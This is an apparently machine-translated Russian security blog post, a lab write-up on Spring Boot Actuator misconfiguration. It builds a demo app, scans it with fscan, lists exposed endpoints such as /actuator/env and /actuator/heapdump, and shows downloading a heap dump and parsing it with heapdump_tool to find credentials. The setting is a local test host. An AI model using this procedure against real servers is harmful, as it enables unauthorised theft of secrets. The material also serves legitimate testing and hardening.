✎ Чтение инструкций

Технические статьи Crow Security предназначены только для справки. Информация, представленная в этой статье, предназначена только для сотрудников сетевой безопасности, позволяющих обнаруживать или обслуживать веб-сайты, серверы и т. д. (включая, помимо прочего), за которые они несут ответственность. Пожалуйста, не используйте эту информацию. в статье без авторизации. Техническая информация для выполнения интрузивных операций в любой компьютерной системе. Пользователь несет ответственность за любые прямые или косвенные последствия и убытки, возникшие в результате использования информации, представленной в настоящей статье.

Crow Security имеет право изменять, удалять и интерпретировать эту статью. Если вы перепечатываете или распространяете эту статью, вы должны обеспечить целостность статьи. Перепечатка без разрешения запрещена.

Инструменты, представленные в этой статье, предназначены только для обучения и не могут использоваться для других целей. Удалите файлы инструментов в течение 24 часов! ! !

Время обновления: 20.07.2022.

иллюстрировать

Многие мастера некоторое время назад выложили эту уязвимость, а другие мастера уже написали ее очень хорошо, поэтому здесь мы в основном рассмотрим, как устроена среда уязвимости.

1. Знакомство с уязвимостью

Spring Boot Actuator Модули обеспечивают функциональность производственного уровня.,Например, проверка здоровья,аудит,Метрическая коллекция,HTTP Отслеживание и т. д.,Помощь в мониторингеиуправлятьSpring Boot приложение. Этот модуль представляет собой модуль, который собирает внутреннюю информацию приложения и предоставляет ее снаружи. Вышеуказанные функции можно использовать через HTTP. и JMX доступ. источник：https://mp.weixin.qq.com/s/qY-hBSa9u62TNB4-A4RZ9Q

ActuatorдаSpring BootПредоставляется платформа с открытым исходным кодом для мониторинга прикладной системы.。Часто встречается в наступательных и оборонительных сценариях.ActuatorНеправильная конфигурация,Злоумышленник может напрямую загрузитьheapdumpДамп кучидокумент,Затем используйте некоторые инструменты для анализаheapdumpдокумент,Это обеспечивает дополнительный доступ к конфиденциальной информации.

источник：https://mp.weixin.qq.com/s/qY-hBSa9u62TNB4-A4RZ9Q

2. Построение среды уязвимости

Создание среды：windows10 + java1.8 Вы можете напрямую следовать команде, но при настройке среды могут возникнуть определенные проблемы:

git clone https://github.com/callicoder/spring-boot-actuator-demo.git
cd spring-boot-actuator-demo-master
mvn package
java -jar target/actuator-demo-0.0.1-SNAPSHOT.jar

mvnустановка,Вы можете скачать его с Baidu.,Это проще. осуществлятьmvn package

В это время возникает ошибка:

Потому что мы не используемIDE,Итак, вы можете использовать этот метод здесь:

https://blog.csdn.net/qq_39323945/article/details/125110368

Другие методы могут оказаться неподходящими. Продолжаем компилировать, ждем некоторое время, компиляция прошла успешно:

Затем запустите среду:

java -jar target/actuator-demo-0.0.1-SNAPSHOT.jar

текущий доступipинформация：http://10.211.55.5:8080/

На этом настройка среды завершена.

3. Эксплуатация уязвимостей

3.1 Обнаружение уязвимостей

Вообще говоря,Эту уязвимость можно обнаружить с помощью инструментов сканирования.,доступно здесьfscanПриходите и попробуйте：

./fscan_darwin -h 10.211.55.5

Здесь можно найти две уязвимости:

[+] http://10.211.55.5:8080 poc-yaml-springboot-env-unauth spring2
[+] http://10.211.55.5:8080 poc-yaml-spring-actuator-heapdump-file

3.2 Способ использования

источник：https://mp.weixin.qq.com/s/qY-hBSa9u62TNB4-A4RZ9Q

Actuator Есть две версии

1.x версия

/configprops # Показать все @ConfigurationProperties
/env # Раскройте конфигурируемую среду Spring/health # Отображение информации о работоспособности приложения
/httptrace # показывать HTTP Информация для отслеживания
/metrics # показывать Мониторинг метрик текущего приложенияинформация。
/mappings # showСобранный список всех путей @RequestMapping
/threaddump # Дамп темы

/heapdump # Дамп кучи
/jolokia # Мост JMX-HTTP, обеспечивающий доступ к JMX. альтернатива фасоли

2.х версия

/actuator/configprops # Показать все @ConfigurationProperties
/actuator/env # Раскройте конфигурируемую среду Spring/actuator/health # Отображение информации о работоспособности приложения
/actuator/httptrace # показывать HTTP Информация для отслеживания
/actuator/metrics # показывать Мониторинг метрик текущего приложенияинформация。
/actuator/mappings # showСобранный список всех путей @RequestMapping
/actuator/threaddump # Дамп темы
/actuator/heapdump # Дамп кучи
/actuator/jolokia # Мост JMX-HTTP, обеспечивающий доступ к JMX. альтернатива фасоли

3.2 springboot-env-unauth

общественный Spring изConfigurableEnvironment

http://10.211.55.5:8080/actuator/env

http://10.211.55.5:8080/actuator/configprops

2.3 spring-actuator-heapdump

Фактически в реальном бою,最重要из就даheapdumpдокумент,Теоретически в этом файле можно найти много конфиденциальной базы данных и другой информации.

http://10.211.55.5:8080/actuator/heapdump

Файл можно скачать прямо на локальный компьютер и расшифровать с помощью профессиональных инструментов;

Адрес профессиональных инструментов:

https://github.com/wyzxxz/heapdump_tool

Как использовать：java -jar heapdump_tool.jar heapdump

image.png

Выбирайте здесь1,Затем найдите ключевые слова:

image.png

Конечно, в этой среде никакой конфиденциальной информации пока не обнаружено, но в реальном бою есть вероятность, что конфиденциальные данные могут быть обнаружены:

image.png

4. Резюме

Другие инструменты для получения информации в виде открытого текста можно найти по следующим ссылкам: https://mp.weixin.qq.com/s/JKq4WxFKwh7IDIAqTKcTHw